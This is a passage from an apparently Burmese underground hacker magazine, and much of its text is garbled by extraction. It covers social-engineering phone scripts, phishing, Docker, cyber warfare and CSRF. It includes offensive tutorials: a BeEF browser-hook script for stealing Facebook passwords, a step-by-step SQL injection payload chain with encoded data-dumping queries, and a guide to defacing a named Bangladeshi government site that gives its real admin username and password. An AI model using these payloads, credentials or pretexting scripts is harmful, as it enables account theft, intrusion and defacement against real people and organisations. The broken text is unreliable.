B24565

100 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Attacker: ။ ။႔ ( ႔ ၊) ႔႔ ႔ ။ ႔။ ၂၁။ Attacker ႔ ၊ ၐ ၍ ၍O ဏ ႔ ႔ ၊႔ Att ။ ။ဏ ႔ B St Attacker Attacker Account ဏ ၊ ၍ ႔ ။ ၍ ။ ။ ႔ ၏ Personal ID ။ ၎ Diversion Theft ။၎ - Reciver: ။ Attacker: MD ။ ႔ ႔။ ။ Reciver: ။႔ ႔ ။ ၂၂။ Attacker ၎၏ ၏ ၍ ။ ႔ Attacker ၊ ႔ ၊႔ ။ ၍႔ ၍။ Attacker: ႔႔ ။ ။ Reciver: Mail [email protected] ႔ ။၅ ႔ ႔ ႔ ။ ။ ။ ၂၃။ Attacker ၊႔ ၏ Attacker ၏ Mail ႔ ။႔ Power By Union Of Underground Myanmar Hackers

101 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၏႔ ။ Diversion Theft Social ၍။ Engineering ႔၍ ႔႔ Diversion Theft ။ ႔ ဏ၊ ။ ၍ ၎႔ Diversion Theft ။႔ ၍ ႔ ႔ Network ၊ ၊ဏ ၍ ၊ Diversion Theft ။ Phishing ၂၄။ Phishing Fishing ၍ ၐ Email Social Engineering ။Phishing ၊ ႔ ။၎ Email ၏ ၏ Personal Mail Address ၏ P ၊ Online Bank Account ႔ ။႔ Web page ႔ ။ Email ၏ Email Password Link Click ၍ ၏ ။ ၎ Link Web Page ႔ Web Page ။ ၎ Web Page ၏ Personal ၊ Password ၊ Bank Account ႔ ႔ ။ Attacker P Web Page ၍။ ၏ Bank Account S tU t Bank Account ႔ဏ ။ ၍ Update Account ။၎U t Link http:\\\\Security.company.com\\update\\ update.html ႔ ၊ Login.html Att Phishing Web page Link ၍ Mail ႔ P Att ။၎ Phishing Attack Domain Name ၍ Login Page Power By Union Of Underground Myanmar Hackers

102 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Web page ႔ ၍ P႔ ။ ၂၅။ ႔ ၎ ႔၏ ၊ ၎ Phishing Mail Mail / Phishing Attacking ။ ၊ Phisher ၍ ၎၏ Data ။႔ ၊ ႔ ၏ Bank Account ႔ Bank ။႔ Link၊ Domain Name ။ ဏ Website security.company Web page link ။၎ Phishing Domain Phishing ႔။ http:// t P ႔ ။႔ http://www.mircor-soft.com ၊ http://www.micorsoft.com ။Phishing - Phis M ( )Phishing Email Grammer ၊ Spelling ၊ ( )Bank ဏ Personal M Email ၍။ ( )Bank ဏ Personal M ၍ Account ၍ ႔ ။ ၂၆။ Phishing E Website ၍႔ ။ Internet User Website ၊ UserName Account P Website ႔၎ Cookies Computer ။၎ Cookies Internet ။ ၍ Cookies User User Name Password ၊ URt User Register ႔ Power By Union Of Underground Myanmar Hackers

103 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH User ႔ ႔ ။႔ Phisher Link ႔ Website Phisher ၍ ႔ Personal Website C Phishing OR ။ Link C Cookies Phisher ။႔ User Name Password ၊၏ ႔ ။ ႔P L Vulneravilities W ၊PDF ႔ ၍D ႔ ၊ P ။ ၍ ၎D File Trojan Phisher ႔႔ ။O R File Data Phisher ႔႔ ။႔ ႔ Website ၊ Internet Security System OR ႔။ Email Login Page Email Link / File Storage Size ၍ Email Link ၍ P ။႔ Email Page Website ၊ Security ၍ ၍ ၊ Website Email ႔ Webpage ။ Phisher Phishing Webpage ။ Phishing Email F Mail ၊ Mail ႔။ IVR ၐ Phone Phishing ၂၇။ Phone Phishing Email Phishing ။Phishing Email ႔၍ Phisher ၏ ၍ PP ။ ၍P ။ Phone Phishing Vishing ၐ ။၎ ၏႔ ၍ ႔။ ၍ mail4u.com.mm Mail Service - Attacker: ၁- ၉၂၉ ။ Receiver: Attacker: ၉၂၉ ။ ။ mail4u Service Network Admin ။ Power By Union Of Underground Myanmar Hackers

104 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Receiver: ။mail4u ။ Attacker: ။ Receive: Attacker: ႔ mail4u Service Server Hard Disk System Receiver: Attacker: Error Dt Receiver: ႔ ၂၈။ Username M။ Attacker: M ။M Receiver: Attacker: ႔ User Name Password ႔ ။ Receiver: Attacker: ႔ Company ႔။ Receiver: ၊ Customer ႔P Attacker: ။၍ User P ၏M ။ ၊ ။ Username achitkoko Password ၂၉၁၈၂၇၃ ။ M ႔။ ၄ Company ၍ Password ။ Attacker ၍၍ ။ ၁- ၉၂၉ ။ ၉၂၉ ။ ။ mail4u Service Network Admin ။ ။ ။ mail4u ။၍ ။ ႔ Mail Account M ။ ၍ ႔႔ ႔ ၏ Mail Account ။ ။ Mail ၊ ႔ Report ။ Username Password ။႔ Account ႔႔ ။ ႔ ႔႔ Username Password Power By Union Of Underground Myanmar Hackers

105 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔႔ ။၍ ၵ Account ။ Receiver: ၊ Account ။ ၂၉။ Account ။ Username Moethout Account ၏ Password ၂၆၃၇၄၈၃၇ ။ Phone Phishing ၊ ၍ ။O B St ဏ ၍ ၏႔ ဏ Account ၏ Username ၊ Password Phone Phishint ၍ ။႔ Phone Phishing Company ၏ Network System Company Company ။ Attacker: Boss Company ။ Receiver: Attacker: ၊။ Receiver: Network Admin ။ Duty Attacker: Receiver: ။ Attacker: Receiver: ။ Duty ။ Attacker: ။ Receiver: Attacker: ။။ Receiver: Network ။ Attacker: ။၊ ။ ႔ ႔ Monitor Report System ႔ Using Status Status Network Alert ႔ ။ ႔ User ။ Alert Network Security Attack ။႔ ႔ ႔။ ။ Account Sign out ။ ။။ ။ ၊ Username Account ၐ ႔ ႔U ?P Duty Network Attack ။ ။။ ။ Status ။ ၊။ Power By Union Of Underground Myanmar Hackers

106 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Receiver: Username Password ။႔ Attacker: ။ Username moetain Password chitpankhat ။ ၊ ။ ၊ ၃။ ၍ Social Engineering ၊ ၍ ။ ႔ ႔ ။ ၊ ။ ၍ Account ၐ ႔ Phone Phishing ၊ ။႔ ၄ ၐ၍ ၄ ။ P၏ ႔ ၍ Phone Phishing ၏ Baiting ၃၁။ Baiting Phishing ၍ၐ Software ။ Phishing Email ၍ ႔ ။ Baiting Hardware ၏ Malware ၊ ။ Trojan Program ႔ ။႔ Floppy Disk ၊ CD USB Flash Drive ၊ ၊ ၐ၊ ။၏ ႔၊ ၍႔ Computer ။႔ ၄ Hardware Password Trojan Data Username ႔ ႔၊ BackDoor ၄ ။ ၏ Username၊ P ၊ ၐ။ ၃၂။ Social Engineering Baiting Hardware Power By Union Of Underground Myanmar Hackers

107 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔၊ Company Pt ၊ Antivirus Company Software ၊ Hardware ၍ ႔ ၊ ။ Baiting Social Engineering Computer ႔ Computer Company ႔ ၏ Computer ။ Bt ။ Quit Pro Quo ၃၃။ Quit Pro Quo ။Social Engineering Attack ၄ ၍ ။ Phone Number ႔၊ ၐ ၍ Company ၐၐ ။၍ ၐ ၄ၐ၏ ၐ ၏ Computer ။႔ ၏ Trojan Website Link ၊ ႔ Command ႔ ။ ၂၃ ၐ Company ၉ ၄ ၏ Username ၊ Password ၊ ၍။ ၃၄။ Blogging Internet ၍ Social Engineering Website ၍ ၏႔ ၏ Computer ။ Social Engineering Attack ၐ ၍ ။ ၃၅။ Social Engineering ၊ Email ၊ ။ Power By Union Of Underground Myanmar Hackers

108 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Chatting ။ Instant Messaging System C tt Social Engineering ၍ ။C tt ၏၊ ။ ၍ C tt ။၍ ၏။ ၊ ၍၊ ၍ ႔။ ႔၏ ႔ ၐ ။၍ ဏ ။ C tt Social Engineering ၏ ႔၏ ။ ၊ ၊E ၍ ၍၊ ႔ ။ Mail4u Service Mail Address Social Engineering ၍ Mail Password ။Mail4u Company ။ ၏ ၍ Mail Service Company P Password ၍ ။Mail Service Company ၄႔ ၍ ။႔ Company ႔ ၊ ။႔ Company Mail Password ၏ ၏ ႔ ။ ၃၆။ Social Engineering Network ၊ ။ Network Administrator ၏ ၏ Social Engineering ၏ Power By Union Of Underground Myanmar Hackers

109 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ၐ ၐ ႔ ။ ။ ႔၏ ၊ ႔ ။ Social Engineering ၍ ။ ႔ ။ ၍ ၊ S Spam ၏ ၍ Mail ၊ Password ႔ Phisher ၏႔ ၍ ။႔ ၏႔ Mail 24 Hours ။ Mail ႔ ၍ ။ ႔၏ ။ ၍ Mail Account ။ Account S ၍ ။ Network Administrator ႔ ႔ ၍ ၏ Network ၊ ၄ ၏ Network ႔ ၍ ၊E ။ ၓ၏ ၓ၍ ႔ ။ ။ Social Engineering ။ ၍၄ Social E ၏ ၄ၐ ။ ႔ Social Engineering ။ g4 MHU Power By Union Of Underground Myanmar Hackers

110 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH BITCOIN ( BTC ) H1N1 And Naing Lin Oo Bitcoin Nt ၊၂ ၈ ႔ St ။ Bitcoin ၊ ႔႔ ၂၉ 1 BTC USD 4 D ၊ ၐ 1 BTC USD 16860 Dollar ၊ Bt ၊ Bitcoin ၂ ၁၇ ႔ ဏ ၊ Bitcoin ၂ ၁၆ USD ၂ ၁၇ USD ၐ ၂ ၁၇ Ransomware Wanna Cry ၊ Exchange ၁၅ USD ၊ Wanna Cry Ransomware ႔ Microsoft Windows Operation System ၊ Bitcoin ၐ Encrypt ႔ ႔ ၊ BTC Bitcoin ႔ ။B t ႔ BTC ႔ ႔။ 2018 $64 Million ။ ၊ BTC ႔ Power By Union Of Underground Myanmar Hackers

111 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH DOCKER (၁) ႔ ( IT ) Docker ၊ ။ Docker Docker open-source ။t Linux Container( LXC) Deploy ။ Containerization ႔ ။ L OS ၐ ႔ operating system level virtualized ။ virtualized t VMware, Virtual Box ႔ Hypervisor Virtualization Containerization ။ Virtualization Containerization ။ Image Source: https://jaxenter.com/ ။ virtualization Host OS hypervisor guest OS ။ Guest OS Kernel၊ L Containerization Host OS K , L ။ virtualization P Host OS ( server) ။ Performance ၊ ။ RAM 8 GB Host OS virtualization Host 2GB 2GB guest OS ႔ ။ 8GB ။ Ct ႔ Ht ၐ Power By Union Of Underground Myanmar Hackers

112 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Performance ။ Containerization ႔ ။ Virtualization ။ Docker Installation Docker Linux Container ( LXC ) Microsoft Window ႔ t ၊Window 10 ႔ Window Server 2016 ။ Linux ။ Docker Community Edition ( CE ) ႔ Enterprise Edition ( EE ) ။ Docker CE ။D EE ။ https://www.docker.com/pricing Docker Install ႔ C ။ #zypper in docker ( openSuSE based ) #apt-get install docker-ce ( Ubuntu based) #dnf install docker-ce ( Fedora based) openSuSE ႔ ။ #zypper in docker Power By Union Of Underground Myanmar Hackers

113 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Dt tt ။ #systemctl start docker.service T tI H run ။ #docker run hello-world H dock ။ Docker Developement Build -> Ship -> Run ႔ ႔ ။ Build ႔။ ႔ run ႔ Power By Union Of Underground Myanmar Hackers

114 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH I ႔ ။Docker O ၊D DI ။ ။ https://hub.docker.com/explore/ Development Environmet ။။ ။ DC C tS t ။ PDF link: https://www.docker.com/sites/default/files/Docker_CheatSheet_08.09.2016_0.pdf Docker ႔ ႔ ။ Konova ( openSuSE Myanmar Team) Power By Union Of Underground Myanmar Hackers

115 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Developer vs Pentester In Myanmar Develpoer ႔ ႔D ႔႔ ။ Mobile Phone operating system (IOS,Android,java and etc ) application D ။႔ Website Developer ၊software developer ၊game developer ၊ application developer ၊ iOS developer ၊ android developer ႔D ။႔ ႔ ၊႔ ။ ႔ programming ဏ ။႔ ႔ Security ။ Developer ။ Pentester Pentester Programming ။ ႔႔ zero day exploit programming ႔ ၊ Pentest Website, software, game , application,operating system D ။ ႔ Pen- Bug ႔ ၐ developer ၊ ။ ။႔ ႔ ။ Developer Developer ႔ company ႔ Developer ႔ company ႔ tester ႔ ။ website t ။ Website ၊႔ ၏ ၐ။ ။ website Facebook ႔ Website Facebook White Hat list ဏ Facebook White hack list ဏ ။ Ebay ဏ ။ Ebay ၏ White Hack List ။ pentester ။ Power By Union Of Underground Myanmar Hackers

116 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH P tt ။ Google search engine website t ။H ၊ ။ ၍ Developer ၊ ၊ ႔ ၊ ။ tt ႔ ။ ။ tt t ။ Myanmar Hacker t pentest ။ website ႔ online banking ။ ၂၄ shutdown ႔ ႔ Developer ။ UGMH ႔cyber war online bank ။screenshoot ၎ ႔ UGMH Page ။ website cyber war t ။ ဏ website ။ website ။ Developer pentester ႔ ။ t bug report ႔ pentester ႔ ။ bug report ႔ Power By Union Of Underground Myanmar Hackers

117 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH website ၊ ၊ ၐ website ။ H ။ Error \" ။ website ၍\" ၐ server ။႔ ။ website ၏ ၐ။ ႔ app website tt ။႔ t ။ pentester website ႔ tt ၍ ႔။ Developer pentester ၊ cyber space …။ Mr.Ph03nix (Black Hat Area) Power By Union Of Underground Myanmar Hackers

118 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

119 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Cyber Warfare Mg Alarm @ Myanmar Security Forum [x] What is Cyber War -> - ၂၁ ႔႔ War ။ ႔ Media Media War ။ ႔ Commercial War ။ ႔ ႔ Online Hack Cyber War ။ ႔ ၊ ၊၊ ၊ ႔ ႔႔ ႔ Cyber War ႔ ၊Cyber War ၊ Cyber War ႔ ႔႔ E-Govermence / E-Commerce / Communication System O ၐ ။ -Cyber War Government / Military ႔ ။ ၊ ၊ ႔ ၊ Political Reason ႔ Hacktivists ။ ။ Cyber War ။ ။ Cyber War ၐ - Cyber Warfare Nt Wt G tP t Down ၊ Wt D t /M t ႔C ႔S ။ Website Database ၊ ... D t /P Dt ႔႔ ။ [x] Examples of CyberWarfare -> ႔႔ - ၁၉၉၈ ႔ Air Traffic Control ႔ Air Defense System ႔ Tt ႔။ -၂ ၇ Estonia ႔ website / website / t ႔ botnet ႔ Ddos ႔O ႔ ။ Power By Union Of Underground Myanmar Hackers

120 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Estonia ႔ ၂ ႔ ႔႔ ႔႔ ။ -၂ ၇ C ႔ Mt A Download 1T H t / G 1000 I t ႔။ -၂ ၉ ၁ Government ႔ P t Ot t GhostNet ႔ ၐ ႔ Cyber Spy Network ႔။ GhostNet ႔ Original China ႔ ႔႔ ႔ ႔ Responsibility ႔။ ႔ -၂ ၈ ႔ ႔။ ၃ t tG tW t C Deface ။DDoS ။ Wt M ႔ ႔႔ ။R t ႔ ႔ ႔။ [x] What Do We Know -> ႔ ႔ .. - Cyber War ႔။ ႔။ - Cyber Attack ႔ C D ႔ ။ - Att HP St HV T t ။ - H V St Wt ႔ ႔ ႔ Government Website ၊ C ၊M W t ။ - Political Reason ႔ ႔ ႔ Cyber War ။C I t ႔ ။P t Dt ။ ။ ၊ ၊M t D t ။C D t Power By Union Of Underground Myanmar Hackers

121 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH [x] GhostNet -> Cyber War ႔ ။ၐ ႔ ႔ Cyber Espionage Network : GhostNet ... Remote Administration Tool (RAT) BotNet ...Canadian Report GhostNet Web Cam / Microphone ႔ Network Infected Computer ႔ device Operate ။ Download ။Computer Full Access ႔ ။၂ ၉ March ႔။ ႔ ႔ ႔ Email ၐ။ meeting ႔ GhostNet ။ ။ ႔ meeting ႔ Warning ၁ Military / Government R Dt Ct ၁၃ / Commercial ႔။ ၁၃ ၁၃ ႔။ ။C GhostNet ႔ ႔ New York Time ႔ ။ Ghost Net ႔I t Ct ၃ ႔ ။ Bangladesh, Latvia, Indonesia, Philippines, Brunei, Barbados, and Bhutan, embassies of India, South Korea, Romania, Cyprus, Malta, Thailand, Taiwan, Portugal, Germany, and Pakistan ႔ ႔ ၊ ဏ Asia Development Bank ၊ ၊ ႔ GhostNet ႔ North Atalantic Treaty Organization NATO ႔႔ ။ …… Att Access ။ Cambridge Report ႔ Attacker Attachment Download U Spam Mail ႔ ႔ Netwok ႔။ [x] Unit 121 -> ႔C ႔႔ ႔ Bureau 121 ၊ Unit 121 ႔ ႔ North Korea Cyber Warfare Agency ၁၉၉၈ ႔႔ ။၂ ၁၁ ႔ ဏS C Power By Union Of Underground Myanmar Hackers

122 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ ႔။ ႔။ ႔ ႔ ႔ ႔႔ ႔ ႔႔ ႔ ။ ႔ Computer Science Professor ႔႔ Cyber Warfare ႔။ Ut L ။ ႔/ Computer Science ႔ ႔ ။ Wiki Specialist ၊ ႔H ႔။ 1800 ။ Cyber Spying ႔ ႔႔ ႔၈ ႔ ။၂ ၁၄ ၁၁ ႔ ႔ The Interview ႔ Sony Film ႔ Internal Network hack ႔ ။ ႔ Computer Screen Red Skeleton ၊ ႔ Message ႔ ႔ ။ H ႔ (GOP )Gurdian of Peace ႔ ။ H Sony It Dt ႔ Sony P Terabyte ႔ ႔ ႔။ ႔ O Sony It P E Sony ႔ ႔။ F H t St Leaked ႔ ။R ။ ႔ t record / proof ႔ zone-h ၂၁ ႔ submit ႔ D t ၁၄ ႔ ။႔ ။ zataz.com ႔ ႔ hacker ႔ ႔ whitehous- e.gov deface ႔ ႔ ... ႔ t ႔ ႔ Defacement ။ [x] Cyber Warfare ? Why They Choose ? ။ ၂၁ C W CC ႔။ ၂ ၇၂ ၉ ႔ Joint Strike Fighter F35 Lightning 2 ႔ ႔ ႔ file / data / Air Force's air traffic control ႔။ ၇ ႔H systems ၐ ႔ ႔ ႔ ႔ ႔ Military ႔ Company ။ ၃ ႔ USCyberCom ႔။ ႔ ႔႔ ။ ႔ Power By Union Of Underground Myanmar Hackers

123 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH T ႔ Attack ႔႔ ။ ႔ Washington CNN ႔ ႔ ႔။ ၂၁ ႔ ႔ Computer ႔ Network ၐ။ ႔ Nt It t O Real Life ၊ ။ ႔။ ႔ ။ ။Laptop Cyber War | Warfare in the Cyber Space ႔ Cyber ႔ ႔႔ ႔႔ ႔ Laptop ႔ C ႔ ။Cyber Field ။ ႔႔ A။ A႔ Oၐ I tW PW ႔။ [x] Conclusions -> ႔ CW ႔ Cyber Terrorism ၊ Cyber Espionage ႔ ။ ။ၐ ႔႔ CW ။ Cyber ႔ ။ C Att ႔ ႔ Cyber Defence ။ ႔ Cyber War ၊ Cyber War ႔ ႔႔ ။။ Mg Alarm @ Myanmar Security Forum Power By Union Of Underground Myanmar Hackers

124 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH facebook account TaikKyi Thar Facebook Hacking ။႔ ။ Facebook Social Network Internet ။ facebook hacking ။ Facebook socail network personal ႔။ ။ skill ႔ Social Engineering ႔ ႔။ ။ Kali Linux,Networking knowledge, linux knowl ႔ ။Kali Linux install ႔ ။ ။႔ Tool Browser Exploitation Framework (BeEF) ‘ BeEF victim's browser hack ။V t Browser ႔။ ႔ Browser Facebook Account ။ 1. Open BeEF Kali Linux terminal beef-xss ။ beef panel Browser ႔။ http://127.0.0.1:300/ui/panel Panel ႔ Username ,password ။ Power By Union Of Underground Myanmar Hackers

125 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 2. Hook the victim's browser t ‗H ‘ User Browser ႔ ။ ႔ javascript code link user click Browser ။local network Man In The Middle Attack VPS ၐ BeEF install hack ႔ t ႔။ ႔ skill ။ ႔ ။Kali Linux ႔ ။ Kali linux local ip ႔ ifconfig ႔ ။B ―G tt ‖ ။ Power By Union Of Underground Myanmar Hackers

126 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Local IP ႔ Javascript code IP ႔။ <script src= \"http://192.168.1.101:3000/hook.js&#8221 ; type= \"text/javascript\" ></script> IP 192.168.1.101 ။ ip ။ ႔ javascript code webpage t ႔။ ႔ Kali Linux ။ js code apach webpage ။ save terminal service apache2 start R ။ Power By Union Of Underground Myanmar Hackers

127 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH attack User Browser ႔႔ ။ local ip address http://192.168.1.101 ႔ SE victim ။ SE ။ ႔႔ link victim ႔ panel online browser Ip ႔ ၐ BeEF ။႔ command search Pretty theft facebook ။ Power By Union Of Underground Myanmar Hackers

128 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Execute ။ victim Browser ။ t tt email,password ႔ BeEF panel ။ Power By Union Of Underground Myanmar Hackers

129 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH facebook ? ။ ႔ ။ password Facebook Security and Loign 1. Get alerts about unrecognized on ။ 2. Use tow-factor authentication on ။ 3. Trusted Contacts on ။ ႔ ႔ ။F remove t ။ TaikKyi Thar Power By Union Of Underground Myanmar Hackers

130 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Sqli Injection [ routed query] Sql injection ႔ ။႔ tt ။ ႔။ sql injection ။ Sql Injection ။႔ ။ Sql Injection ။ ။ Injection point: http://site.com/urunler.php?id=83 Err / 83 (‘) ။ http://site.com/urunler.php?id=83‘ HATA : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1 E ။Error ။ http://site.com/urunler.php?id=83 order by 1 [No Err] http:// site.com/urunler.php?id=83 order by 2 [No Err] http:// site.com/urunler.php?id=83 order by 9 [No Err] http:// site.com/urunler.php?id=83 order by 10 [No Err] http:// site.com/urunler.php?id=83 order by 11 [Err] Power By Union Of Underground Myanmar Hackers

131 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Unknow column 11 column 10 ။ ။ :P http://site.com/urunler.php?id=-83 Union Select 1,2,3,4,5,6,7,8,9,10 http://site.com/urunler.php?id=-83 Union Select 1,2,3,4,5,6,7,8,9,10-- - http:// site.com /urunler.php?id=-83 div 0 Union Select 1111111,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,101 01010 Vul column ။ Source ။။ Power By Union Of Underground Myanmar Hackers

132 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Routed Quey http://site.com/urunler.php ?id=-83 div 0 Union Select 1',2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 C1 ' H 1‘=0 3127 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3127,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101 010 Power By Union Of Underground Myanmar Hackers

133 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Err :P column http://site.com/urunler.php ?id=-83 div 0 Union Select 1 order by 1,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 1 order by 1=0x31206f726465722062792031 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x31206f726465722062792031,2222222,3333333,4444444,55555555,66666666,77777777,888 88888,99999999,10101010 Err ၂ ။ Order by 10 ။ http://site.com/urunler.php ?id=-83 div 0 Union Select 0x31206f72646572206279203130,2222222,3333333,4444444,55555555,66666666,77777777,8 8888888,99999999,10101010 http://site.com/urunler.php Power By Union Of Underground Myanmar Hackers

134 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ?id=-83 div 0 Union Select 1 order by 11,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x31206f72646572206279203131,2222222,3333333,4444444,55555555,66666666,77777777,8 8888888,99999999,10101010 U ‘11‘ ၁ http://site.com/urunler.php ?id=-83 div 0 Union Select 1 Union Select 1,2,3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,66666666,77777777,88888888,999 99999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c322c332c342c352c362c372c382c392c3130,2222222, 3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 Power By Union Of Underground Myanmar Hackers

135 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH VC ။ title ။ http://site.com/urunler.php ?id=-83 div 0 Union Select 1 Union Select 1,concat(</title><br>,222222222),3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,666 66666,77777777,88888888,99999999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c636f6e636174283078336332663734363937343663 3635336533633632373233652c323232323232323232292c332c342c352c362c372c382c392c31 30,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 Version ။ http:// site.com/urunler.php Power By Union Of Underground Myanmar Hackers

136 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ?id=-83 div 0 Union Select 1 Union Select 1,concat(0x3c2f7469746c653e3c62723e,version()),3,4,5,6,7,8,9,10,2222222,3333333,4444444, 55555555,66666666,77777777,88888888,99999999,10101010 http:// site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c636f6e6361742830783363326637343639373436633 635336533633632373233652c76657273696f6e2829292c332c342c352c362c372c382c392c3130, 2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 DiOs http:// site.com/urunler.php ?id=-83 div 0 Union Select 1 Union Select 1,concat(0x3c2f7469746c653e3c62723e,(Select+export_set(5,@:=0,(select+count(*)from(infor mation_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),col umn_name,0xa3a,2)),@,2))),3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,66666666, 77777777,88888888,99999999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c636f6e6361742830783363326637343639373436633 635336533633632373233652c2853656c6563742b6578706f72745f73657428352c403a3d302c28 73656c6563742b636f756e74282a2966726f6d28696e666f726d6174696f6e5f736368656d612e63 6f6c756d6e73297768657265403a3d6578706f72745f73657428352c6578706f72745f7365742835 2c402c7461626c655f6e616d652c307833633663363933652c32292c636f6c756d6e5f6e616d652c 30786133612c3229292c402c322929292c332c342c352c362c372c382c392c3130,2222222,33333 33,4444444,55555555,66666666,77777777,88888888,99999999,10101010 Power By Union Of Underground Myanmar Hackers

137 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH IG t t…H I t …… ။။။ St ။ ။ Union Select Union Union Select ။S S t ။ Select ။ Union base ။Injection ႔ ။ ။ Sql God BMH Power By Union Of Underground Myanmar Hackers

138 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH CSRF(cross site request forgery) By webkitz (Myanmar Security Forum) What is CSRF? One Click Attack / Session Riding / Sea-Surf or C-Surf / XSRF ၐၐ Cross Site Request Forgery(CSRF) attack web application t tt (end user) ၄ t attacker(hacker) ။ attacker target(victim) ၄ malicious request Link / web page email / chat social engineering . ။ victim attacker ႔ malicious link ႔ link submit button click ၄ victim / attacker t victim ႔ execute ။ victim user attacker - victim transfer ၊ - change web application ၐ forged request ။ tt t ၍ victim web app attacker Power By Union Of Underground Myanmar Hackers

139 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH -administrative account ၊ -admin . /၊ - tt tt ၊ - tt /၊ -t request ႔ administrative level victim session riding entire web application ။ attacker administrative access ၐ t upload web server ၒ ။ CSRF attack t tt t ၊ attacker .၄ t႔ ။ CSRF Attack (Example) Bank website ( Eg. www.examplebank.com ) user website log ႔ၐ in t t t ႔ ။ web server ႔ user login ၄ user . browser session id ။ / user log out ။ ( ၍ user log out / )။ bank website user ႔ user account ႔ feature ။႔ (Eg. www.examplebank.com/transfer ) Power By Union Of Underground Myanmar Hackers

140 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH User . ၄ form HTTP request ။ . attacker t tt . user social engineering t . html web link . ။ Eg. www.attackerwebsite.com/winmoney.html user bank website t tt attacker trick ၄ ႔ submit button Power By Union Of Underground Myanmar Hackers

141 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH user attacker account ႔ 100 ။ user ႔ attacker ႔ malicious web link / malicious ။ / user bank website . request . attacker java script tt ႔ ။ attacker . victim submit button java script tt .။ Example malicious script CSRF attack ။ ႔ ႔ CSRF attack google ။ , ႔ Knowledge ႔ HTTP t ၊ tt . POST,GET R ။ CSRF attack 2001 OWASP . Top Ten vulnerabilities ။ world- ႔ CSRF preventing Power By Union Of Underground Myanmar Hackers

142 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH csrf tokens , same site cookie . Anti-csrf technique ၐ Youtube, ။ Is CSRF dead? . . t csrf attack ႔ ႔ Netflix, ING Direct, McAfee ၊ ၐ ႔။ anti-csrf token bypass 0႔ ။ Webkitz(msf) Power By Union Of Underground Myanmar Hackers

143 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH How to deface with JS or XSS defacement mr.Gh0st N@0b ( Myanmar Noob Hackers Team) ႔ Sql Injection Admin User ႔ Password Shell ။ Admin User ႔ Password Shell ။ JS or XSS defacement ။ Op_Turkish 2017 ႔ ႔ Sql Injection ႔ Admin, Password Shell ႔ UGMH Defacement ႔ ။ Java Script Defacement ။ Java script ႔ XSS ။ ။ Demo ႔ Gov.bd ။ http://www.sciti-sme.gov.bd/ User Name scitisme ၊ Password 2468@sciti123 ၊ SI t ။ http://www.sciti-sme.gov.bd/admin/ Admin Login ။ Login Admin Dashboard ။ ၁။ Defacement XSS Alert ႔ ။ Deface ႔ Tag XSS Alert ႔ ။ XSS Alert Defacement ႔။ Power By Union Of Underground Myanmar Hackers

